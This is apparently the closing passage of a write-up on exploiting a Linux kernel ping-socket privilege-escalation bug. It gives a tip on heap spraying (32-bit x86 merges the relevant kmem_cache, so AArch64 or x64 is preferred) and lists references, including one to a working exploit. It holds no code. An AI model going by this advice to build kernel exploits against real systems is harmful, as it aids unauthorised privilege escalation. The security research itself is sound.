In addition, if you want to simplify the experiment through a standard x86 machine, be careful. During my exploration, I found that in 32-bit architecture, the kmem_cache for ping sock will be integrated into others, which leads to big trouble of heap spraying. The AArch64 or x64 machine is preferable.


  1. Pwnie for Best Privilege Escalation Bug, 2015. LINK 

  2. goldfish git repo LINK 

  3. One workable exploit LINK